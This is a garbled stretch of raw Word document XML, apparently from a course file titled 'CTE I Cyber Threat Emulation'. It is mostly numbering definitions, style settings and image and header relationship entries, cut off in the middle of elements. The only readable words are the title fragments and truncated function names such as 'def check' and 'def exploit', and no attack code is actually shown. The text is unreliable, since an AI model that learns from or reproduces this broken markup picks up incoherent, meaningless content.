      <w:t>def check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B66ABF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="707" w:lineRule="auto"/>
      <w:ind w:left="90" w:right="12105" w:hanging="1140"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="50"/>
      </w:rPr>
      <w:t xml:space="preserve">I </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t xml:space="preserve">Cyber </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="40"/>
      </w:rPr>
      <w:t xml:space="preserve">Threat Emulation </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t>def check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FCB6B7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="707" w:lineRule="auto"/>
      <w:ind w:left="90" w:right="12105" w:hanging="1140"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="50"/>
      </w:rPr>
      <w:t xml:space="preserve">I </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t xml:space="preserve">Cyber </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="40"/>
      </w:rPr>
      <w:t xml:space="preserve">Threat Emulation </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t>def check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E84E1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="636"/>
      <w:ind w:left="-1050"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="5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  <w:p w14:paraId="7F0932A7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="90"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t xml:space="preserve">def </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>exploit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9BF5A2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1101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F64D7A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="636"/>
      <w:ind w:left="-1050"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="5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  <w:p w14:paraId="6E073D40" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="90"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t xml:space="preserve">def </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>exploit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050A32" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-105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0CA551" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-69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F349CB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-69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E67A28" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-69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DFED35" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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A7153B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-84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8AA923" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-84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A0C4AE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-840"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE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152620" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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045313" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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209F54" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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 id="_x0000_i1076" style="width:2pt;height:2pt" coordsize="" o:spt="100" o:bullet="t" adj="0,,0" path="" stroked="f">
        <v:stroke joinstyle="miter"/>
        <v:imagedata r:id="rId1" o:title="image202"/>
        <v:formulas/>
        <v:path o:connecttype="segments"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:numPicBullet w:numPicBulletId="1">
    <w:pict>
      <v:shape id="_x0000_i1077" style="width:2.65pt;height:2.65pt" coordsize="" o:spt="100" o:bullet="t" adj="0,,0" path="" stroked="f">
        <v:stroke joinstyle="miter"/>
        <v:imagedata r:id="rId2" o:title="image53"/>
        <v:formulas/>
        <v:path o:connecttype="segments"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="01511F1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F23830"/>
    <w:lvl w:ilvl="0" w:tplc="0CB6DF1A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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8662FC3A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EF80825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EB3C0B0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5D1A123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2440213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705CF122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64E2A0C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CA04790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5C439D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32AC5B0C"/>
    <w:lvl w:ilvl="0" w:tplc="2D7E87CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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BE30C506">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12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240C6C6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="19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F5960EE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="27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80F24116">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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5B8C8C8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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C42A2368">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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ACDAA428">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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0004198A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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01B1026"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BA0B1AC"/>
    <w:lvl w:ilvl="0" w:tplc="85DE253E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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3A1A76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7AB84A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00121F1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FDA8C86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76CA878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430208B2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EE1C26E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1AF0B684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DE64473"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="439E99E8"/>
    <w:lvl w:ilvl="0" w:tplc="EA60EE4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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3B84BAC2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375C0FB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5614A53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37FC3AC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64AA673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0B72858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761C6D4E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C7E88B3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65D01B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F3849C6"/>
    <w:lvl w:ilvl="0" w:tplc="98E88B3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8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24D0C6A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="16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D88C16D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="23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ACB63E02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="31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579EC37C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="38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E70C6BFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="45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FC3C1B6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="52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B28C439C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="59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0520F97C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="67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6793C86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63E4A158"/>
    <w:lvl w:ilvl="0" w:tplc="2F94C0CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9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E0A0059E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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DB7841A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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9C305292">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="25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FC3663B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="32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34B0AB12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="40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713A1BC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="47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491A00DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="54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7024A5B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="61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F9116A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F9E8894"/>
    <w:lvl w:ilvl="0" w:tplc="067C2C1A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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6054E8C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450A10D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6BB68D3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17A2E7F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DC369E3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B108243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DE5621FA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ED4AC84A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6155973"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="986628FA"/>
    <w:lvl w:ilvl="0" w:tplc="6346D44A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlPicBulletId w:val="0"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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1" w:tplc="9B42C8BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12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2" w:tplc="945E5704">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="19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3" w:tplc="BC882CA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="26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4" w:tplc="76F40BAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="33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5" w:tplc="EA7C541A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="40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6" w:tplc="F8347ADA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="48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7" w:tplc="71F087EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="55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8" w:tplc="B89CB714">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="62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5BE1997"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B128D14A"/>
    <w:lvl w:ilvl="0" w:tplc="AA74A3DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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5402457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FC74732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296ECB2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B2EA518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44DE6C9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7768368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4670A734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2432031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8E25304"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19D2E0CA"/>
    <w:lvl w:ilvl="0" w:tplc="2D022748">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlPicBulletId w:val="1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9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1" w:tplc="4A4CC890">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14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2" w:tplc="B5E46D08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="22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3" w:tplc="32183548">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="29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4" w:tplc="7152DDBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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5" w:tplc="FF78644E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="43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6" w:tplc="9FD2EB18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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7" w:tplc="AB2895DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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8" w:tplc="870EC0FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5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Q3NDUwMzQzNzSwNDBR0lEKTi0uzszPAykwrAUAA1ARfSwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="007A5F0C"/>
    <w:rsid w:val="006F6D33"/>
    <w:rsid w:val="007A5F0C"/>
    <w:rsid w:val="007C4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952D2"/>
  <w15:docId w15:val="{C0CF604C-10A3-4C01-A353-EE71A5129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25" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="7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409"/>
      <w:ind w:right="3669"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="50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0" w:right="225" w:hanging="10"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="5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50"/>
      <w:u w:val="single" w:color="00000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50"/>
      <w:u w:val="single" w:color="00000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7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7.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpg"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpg"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpg"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpg"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.jpg"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.jpg"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.jpg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.jpg"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.jpg"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.jpg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header19.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpg"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpg"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.jpg"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpg"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer18.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpg"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpg"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.jpg"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header22.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header20.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpg"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpg"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.jpg"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer19.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.jpg"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.jpg"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header23.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.jpg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.jpg"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.jpg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpg"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.jpg"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.jpg"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpg"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header13.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer15.xml"/><Relationship Id="rId121" 